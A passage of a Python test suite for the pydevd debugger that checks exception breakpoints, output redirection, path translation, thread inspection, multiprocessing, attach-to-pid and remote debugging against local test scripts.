with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=False,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions4(case_setup):
# Don't stop on exception thrown in the same context (only at caller).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=True,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_settrace(case_setup):
with case_setup.test_file('_debugger_case_settrace.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(line=7)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(True or IS_PY26 or IS_JYTHON, reason='This is *very* flaky. Scapy only supports 2.7 onwards, not available for jython.')
def test_case_scapy(case_setup):
with case_setup.test_file('_debugger_case_scapy.py') as writer:
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.reader_thread.set_messages_timeout(30) # Starting scapy may be slow (timed out with 15 seconds on appveyor).
writer.write_add_breakpoint(2, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_APPVEYOR or IS_JYTHON, reason='Flaky on appveyor / Jython encoding issues (needs investigation).')
def test_redirect_output(case_setup):
def get_environ(writer):
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
return env
with case_setup.test_file('_debugger_case_redirect.py', get_environ=get_environ) as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
binary_junk = b'\xe8\xF0\x80\x80\x80'
if sys.version_info[0] >= 3:
binary_junk = binary_junk.decode('utf-8', 'replace')
return line.startswith((
'text',
'binary',
'a',
binary_junk,
))
writer._ignore_stderr_line = _ignore_stderr_line
# Note: writes to stdout and stderr are now synchronous (so, the order
# must always be consistent and there's a message for each write).
expected = [
'text\n',
'binary or text\n',
'ação1\n',
]
if sys.version_info[0] >= 3:
expected.extend((
'binary\n',
'ação2\n'.encode(encoding='latin1').decode('utf-8', 'replace'),
'ação3\n',
))
binary_junk = '\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\n\n'
if sys.version_info[0] >= 3:
binary_junk = "\ufffd\ufffd\ufffd\ufffd\ufffd\n\n"
expected.append(binary_junk)
new_expected = [(x, 'stdout') for x in expected]
new_expected.extend([(x, 'stderr') for x in expected])
writer.write_start_redirect()
writer.write_make_initial_run()
msgs = []
ignored = []
while len(msgs) < len(new_expected):
try:
msg = writer.wait_for_output()
except AssertionError:
for msg in msgs:
sys.stderr.write('Found: %s\n' % (msg,))
for msg in new_expected:
sys.stderr.write('Expected: %s\n' % (msg,))
for msg in ignored:
sys.stderr.write('Ignored: %s\n' % (msg,))
raise
if msg not in new_expected:
ignored.append(msg)
continue
msgs.append(msg)
if msgs != new_expected:
print(msgs)
print(new_expected)
assert msgs == new_expected
writer.finished_ok = True
def _path_equals(path1, path2):
path1 = pydevd_file_utils.normcase(path1)
path2 = pydevd_file_utils.normcase(path2)
return path1 == path2
@pytest.mark.parametrize('mixed_case', [True, False] if sys.platform == 'win32' else [False])
def test_path_translation(case_setup, mixed_case):
def get_file_in_client(writer):
# Instead of using: test_python/_debugger_case_path_translation.py
# we'll set the breakpoints at foo/_debugger_case_path_translation.py
file_in_client = os.path.dirname(os.path.dirname(writer.TEST_FILE))
return os.path.join(os.path.dirname(file_in_client), 'foo', '_debugger_case_path_translation.py')
def get_environ(writer):
import json
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
assert writer.TEST_FILE.endswith('_debugger_case_path_translation.py')
file_in_client = get_file_in_client(writer)
if mixed_case:
new_file_in_client = ''.join([file_in_client[i].upper() if i % 2 == 0 else file_in_client[i].lower() for i in range(len(file_in_client))])
assert _path_equals(file_in_client, new_file_in_client)
env["PATHS_FROM_ECLIPSE_TO_PYTHON"] = json.dumps([
(
os.path.dirname(file_in_client),
os.path.dirname(writer.TEST_FILE)
)
])
return env
with case_setup.test_file('_debugger_case_path_translation.py', get_environ=get_environ) as writer:
from tests_python.debugger_unittest import CMD_LOAD_SOURCE
writer.write_start_redirect()
file_in_client = get_file_in_client(writer)
assert 'tests_python' not in file_in_client
writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'call_this', filename=file_in_client)
writer.write_make_initial_run()
xml = writer.wait_for_message(lambda msg:'stop_reason="111"' in msg)
assert xml.thread.frame[0]['file'] == file_in_client
thread_id = xml.thread['id']
# Request a file that exists
files_to_match = [file_in_client]
if IS_WINDOWS:
files_to_match.append(file_in_client.upper())
for f in files_to_match:
writer.write_load_source(f)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE in msg and \
"def main():" in msg and \
"print('break here')" in msg and \
"print('TEST SUCEEDED!')" in msg
, expect_xml=False)
# Request a file that does not exist
writer.write_load_source(file_in_client + 'not_existent.py')
writer.wait_for_message(
lambda msg:'901\t' in msg and ('FileNotFoundError' in msg or 'IOError' in msg),
expect_xml=False)
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_linecache_xml(case_setup, tmpdir):
from _pydevd_bundle.pydevd_comm_constants import CMD_LOAD_SOURCE_FROM_FRAME_ID
with case_setup.test_file('_debugger_case_linecache.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('breakpoint'))
writer.write_make_initial_run()
# First hit is for breakpoint reached via a stack frame that doesn't have source.
hit = writer.wait_for_breakpoint_hit()
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
frame_ids = set()
for frame in msg.thread.frame:
if frame['file'] == '<foo bar>':
frame_ids.add(frame['id'])
assert len(frame_ids) == 2
for frame_id in frame_ids:
writer.write_load_source_from_frame_id(frame_id)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE_FROM_FRAME_ID in msg and (
"[x for x in range(10)]" in msg and "def somemethod():" in msg
)
, expect_xml=False)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_show_bytecode_xml(case_setup, tmpdir):
from _pydevd_bundle.pydevd_comm_constants import CMD_LOAD_SOURCE_FROM_FRAME_ID
with case_setup.test_file('_debugger_case_show_bytecode.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('breakpoint'))
writer.write_make_initial_run()
# First hit is for breakpoint reached via a stack frame that doesn't have source.
hit = writer.wait_for_breakpoint_hit()
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
frame_ids = set()
for frame in msg.thread.frame:
if frame['file'] == '<something>':
frame_ids.add(frame['id'])
assert len(frame_ids) == 2
for frame_id in frame_ids:
writer.write_load_source_from_frame_id(frame_id)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE_FROM_FRAME_ID in msg and (
"MyClass" in msg or "foo()" in msg
)
, expect_xml=False)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_evaluate_errors(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_evaluate_expression('%s\t%s\t%s' % (thread_id, frame_id, 'LOCAL'), 'name_error')
writer.wait_for_evaluation('<var name="name_error" type="NameError"')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_list_threads(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
seq = writer.write_list_threads()
msg = writer.wait_for_list_threads(seq)
assert msg.thread['name'] == 'MainThread'
assert msg.thread['id'].startswith('pid')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_print(case_setup):
with case_setup.test_file('_debugger_case_print.py') as writer:
writer.write_add_breakpoint(1, 'None')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_lamdda(case_setup):
with case_setup.test_file('_debugger_case_lamda.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'None')
writer.write_make_initial_run()
for _ in range(3): # We'll hit the same breakpoint 3 times.
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_case_suspension_policy(case_setup):
with case_setup.test_file('_debugger_case_suspend_policy.py') as writer:
writer.write_add_breakpoint(25, '', suspend_policy='ALL')
writer.write_make_initial_run()
thread_ids = []
for i in range(3):
writer.log.append('Waiting for thread %s of 3 to stop' % (i + 1,))
# One thread is suspended with a breakpoint hit and the other 2 as thread suspended.
hit = writer.wait_for_breakpoint_hit((REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND))
thread_ids.append(hit.thread_id)
for thread_id in thread_ids:
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython (needs investigation).')
def test_case_get_thread_stack(case_setup):
with case_setup.test_file('_debugger_case_get_thread_stack.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydev_bundle' not found while handling absolute import",
"from java.lang import System"):
if expected in line:
return True
return False
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(18, None)
writer.write_make_initial_run()
thread_created_msgs = [writer.wait_for_message(CMD_THREAD_CREATE)]
thread_created_msgs.append(writer.wait_for_message(CMD_THREAD_CREATE))
thread_id_to_name = {}
for msg in thread_created_msgs:
thread_id_to_name[msg.thread['id']] = msg.thread['name']
assert len(thread_id_to_name) == 2
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
assert hit.thread_id in thread_id_to_name
for request_thread_id in thread_id_to_name:
writer.write_get_thread_stack(request_thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == request_thread_id
if not files[0].endswith('_debugger_case_get_thread_stack.py'):
raise AssertionError('Expected to find _debugger_case_get_thread_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
if ([filename for filename in files if filename.endswith('pydevd.py')]):
raise AssertionError('Did not expect to find pydevd.py. Found: %s' % ('\n'.join(files),))
if request_thread_id == hit.thread_id:
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
else:
assert len(msg.thread.frame) > 1 # Stopped in threading (must have back frames).
assert msg.thread.frame[0]['name'] == 'method'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_dump_threads_to_stderr(case_setup):
from tests_python.debugger_unittest import wait_for_condition
def additional_output_checks(writer, stdout, stderr):
assert is_stderr_ok(stderr), make_error_msg(stderr)
def make_error_msg(stderr):
return 'Did not find thread dump in stderr. stderr:\n%s' % (stderr,)
def is_stderr_ok(stderr):
return 'Thread Dump' in stderr and 'Thread pydevd.CommandThread (daemon: True, pydevd thread: True)' in stderr
with case_setup.test_file(
'_debugger_case_get_thread_stack.py', additional_output_checks=additional_output_checks) as writer:
writer.write_add_breakpoint(12, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_dump_threads()
wait_for_condition(
lambda: is_stderr_ok(writer.get_stderr()),
lambda: make_error_msg(writer.get_stderr())
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_regular(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_START, file='_debugger_case_simple_calls.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_breakpoint_cases():
if sys.version_info >= (3, 7):
# Just check breakpoint()
return ('_debugger_case_breakpoint.py',)
else:
# Check breakpoint() and sys.__breakpointhook__ replacement.
return ('_debugger_case_breakpoint.py', '_debugger_case_breakpoint2.py')
@pytest.mark.parametrize("filename", _get_breakpoint_cases())
def test_py_37_breakpoint(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(file=filename, line=3)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_generator_cases():
if IS_PY2:
return ('_debugger_case_generator_py2.py',)
else:
# On py3 we should check both versions.
return (
'_debugger_case_generator_py2.py',
'_debugger_case_generator_py3.py',
)
@pytest.mark.parametrize("filename", _get_generator_cases())
def test_generator_cases(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_START, file='_debugger_case_m_switch.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_START, file='_debugger_case_module_entry_point.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_debug_zip_files(case_setup, tmpdir):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
curr_pythonpath = str(tmpdir.join('myzip.zip')) + os.pathsep + curr_pythonpath
curr_pythonpath = str(tmpdir.join('myzip2.egg!')) + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
env["IDE_PROJECT_ROOTS"] = str(tmpdir.join('myzip.zip'))
return env
import zipfile
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip.zip')), 'w')
zip_file.writestr('zipped/__init__.py', '')
zip_file.writestr('zipped/zipped_contents.py', 'def call_in_zip():\n return 1')
zip_file.close()
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip2.egg!')), 'w')
zip_file.writestr('zipped2/__init__.py', '')
zip_file.writestr('zipped2/zipped_contents2.py', 'def call_in_zip2():\n return 1')
zip_file.close()
with case_setup.test_file('_debugger_case_zip_files.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip.zip')), 'zipped', 'zipped_contents.py')
)
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip2.egg!')), 'zipped2', 'zipped_contents2.py')
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip'
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip2'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('file_to_check', [
'_debugger_case_multiprocessing_2.py',
'_debugger_case_multiprocessing.py',
'_debugger_case_python_c.py',
'_debugger_case_multiprocessing_pool.py'
])
def test_multiprocessing_simple(case_setup_multiprocessing, file_to_check):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file(file_to_check) as writer:
break1_line = writer.get_line_index_with_content('break 1 here')
break2_line = writer.get_line_index_with_content('break 2 here')
writer.write_add_breakpoint(break1_line)
writer.write_add_breakpoint(break2_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
expected_connections = 1
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break1_line)
writer2.write_add_breakpoint(break2_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('count', range(5)) # Call multiple times to exercise timing issues.
def test_multiprocessing_with_stopped_breakpoints(case_setup_multiprocessing, count, debugger_runner_simple):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_multiprocessing_stopped_threads.py') as writer:
break_main_line = writer.get_line_index_with_content('break in main here')
break_thread_line = writer.get_line_index_with_content('break in thread here')
break_process_line = writer.get_line_index_with_content('break in process here')
writer.write_add_breakpoint(break_main_line)
writer.write_add_breakpoint(break_thread_line)
writer.write_add_breakpoint(break_process_line)
server_socket = writer.server_socket
listening_event = threading.Event()
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
server_socket.listen(1)
self.server_socket = server_socket
listening_event.set()
writer.log.append(' *** Multiprocess waiting on server_socket.accept()')
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer.log.append(' *** Multiprocess started ReaderThread')
writer2 = SecondaryProcessWriterThread()
writer2._WRITE_LOG_PREFIX = ' *** Multiprocess write: '
writer2.log = writer.log
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_main_line)
writer2.write_add_breakpoint(break_thread_line)
writer2.write_add_breakpoint(break_process_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
ok = listening_event.wait(timeout=10)
if not IS_PY26:
assert ok
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit() # Breaks in thread.
writer.write_step_over(hit2.thread_id)
hit2 = writer.wait_for_breakpoint_hit(REASON_STEP_OVER) # line == event.set()
# paused on breakpoint, will start process and pause on main thread
# in the main process too.
writer.write_step_over(hit2.thread_id)
# Note: ignore the step over hit (go only for the breakpoint hit).
main_hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.write_run_thread(main_hit.thread_id)
# We must have found at least 2 debug files when doing multiprocessing (one for
# each pid).
assert len(pydev_log.list_log_files(debugger_runner_simple.pydevd_debug_file)) == 2
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_subprocess_quoted_args(case_setup_multiprocessing):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_quoting.py') as writer:
break_subprocess_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_subprocess_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
# Note: on linux on Python 2 because on Python 2 CPython subprocess.call will actually
# create a fork first (at which point it'll connect) and then, later on it'll
# call the main (as if it was a clean process as if PyDB wasn't created
# the first time -- the debugger will still work, but it'll do an additional
# connection.
expected_connections = 1
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_subprocess_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.finished_ok = True
def _attach_to_writer_pid(writer):
import pydevd
assert writer.process is not None
def attach():
attach_pydevd_file = os.path.join(os.path.dirname(pydevd.__file__), 'pydevd_attach_to_process', 'attach_pydevd.py')
subprocess.call([sys.executable, attach_pydevd_file, '--pid', str(writer.process.pid), '--port', str(writer.port)])
threading.Thread(target=attach).start()
wait_for_condition(lambda: writer.finished_initialization)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('reattach', [True, False])
def test_attach_to_pid_no_threads(case_setup_remote, reattach):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_simple.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize to get to the while loop.
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break here')
bp_id = writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
if reattach:
# This would be the same as a second attach to pid, so, the idea is closing the current
# connection and then doing a new attach to pid.
writer.write_remove_breakpoint(bp_id)
writer.write_run_thread(hit.thread_id)
writer.do_kill() # This will simply close the open sockets without doing anything else.
time.sleep(1)
t = threading.Thread(target=writer.start_socket)
t.start()
wait_for_condition(lambda: hasattr(writer, 'port'))
time.sleep(1)
writer.process = writer.process
_attach_to_writer_pid(writer)
wait_for_condition(lambda: hasattr(writer, 'reader_thread'))
time.sleep(1)
bp_id = writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON or IS_PY39_OR_GREATER, reason='CPython only test.'
'3.9: still needs support to attach to pid (waiting for CPython api to stabilize)')
def test_attach_to_pid_halted(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_multiple_threads.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize and get to the proper halting condition
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break thread here')
writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_remote_debugger_basic(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote.py') as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON or IS_PY39_OR_GREATER, reason='CPython only test.'
'3.9: still needs support to trace other threads (waiting for CPython api to stabilize).')
def test_remote_debugger_threads(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_remote_threads.py') as writer:
writer.write_make_initial_run()
hit_in_main = writer.wait_for_breakpoint_hit()
bp_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(bp_line)
# Break in the 2 threads.
hit_in_thread1 = writer.wait_for_breakpoint_hit(line=bp_line)
hit_in_thread2 = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit_in_thread1.thread_id, hit_in_thread1.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_change_variable(hit_in_thread2.thread_id, hit_in_thread2.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit_in_main.thread_id)
writer.write_run_thread(hit_in_thread1.thread_id)
writer.write_run_thread(hit_in_thread2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_breakpoint_remote.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
filename='_debugger_case_breakpoint_remote.py',
line=13,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_py_37_breakpoint_remote_no_import(case_setup_remote):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.join(
os.path.dirname(writer.get_pydevd_file()),
'pydev_sitecustomize')
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
with case_setup_remote.test_file(
'_debugger_case_breakpoint_remote_no_import.py',
get_environ=get_environ) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
"108",
filename='_debugger_case_breakpoint_remote_no_import.py',
line=12,
)
writer.write_run_thread(hit.thread_id)
try:
assert 5 == writer._sequence, 'Expected 5. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('authenticate', [True, False])
def test_remote_debugger_multi_proc(case_setup_remote, authenticate):
access_token = None
client_access_token = None
if authenticate:
access_token = 'tok123'
client_access_token = 'tok456'
class _SecondaryMultiProcProcessWriterThread(debugger_unittest.AbstractWriterThread):
FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
def __init__(self, server_socket):
debugger_unittest.AbstractWriterThread.__init__(self)
self.server_socket = server_socket
def run(self):
print('waiting for second process')
self.sock, addr = self.server_socket.accept()
print('accepted second process')
from tests_python.debugger_unittest import ReaderThread
self.reader_thread = ReaderThread(self.sock)
self.reader_thread.name = 'Secondary Reader Thread'
self.reader_thread.start()
self._sequence = -1
# initial command is always the version
self.write_version()
if authenticate:
self.wait_for_message(lambda msg:'Client not authenticated.' in msg, expect_xml=False)
self.write_authenticate(access_token=access_token, client_access_token=client_access_token)
self.write_version()
self.log.append('start_socket')
self.write_make_initial_run()
time.sleep(.5)
self.finished_ok = True
def do_kill(writer):
debugger_unittest.AbstractWriterThread.do_kill(writer)
if hasattr(writer, 'secondary_multi_proc_process_writer'):
writer.secondary_multi_proc_process_writer.do_kill()
with case_setup_remote.test_file(
'_debugger_case_remote_1.py',
do_kill=do_kill,
EXPECTED_RETURNCODE='any',
access_token=access_token,
client_access_token=client_access_token,
) as writer:
# It seems sometimes it becomes flaky on the ci because the process outlives the writer thread...
# As we're only interested in knowing if a second connection was received, just kill the related
# process.
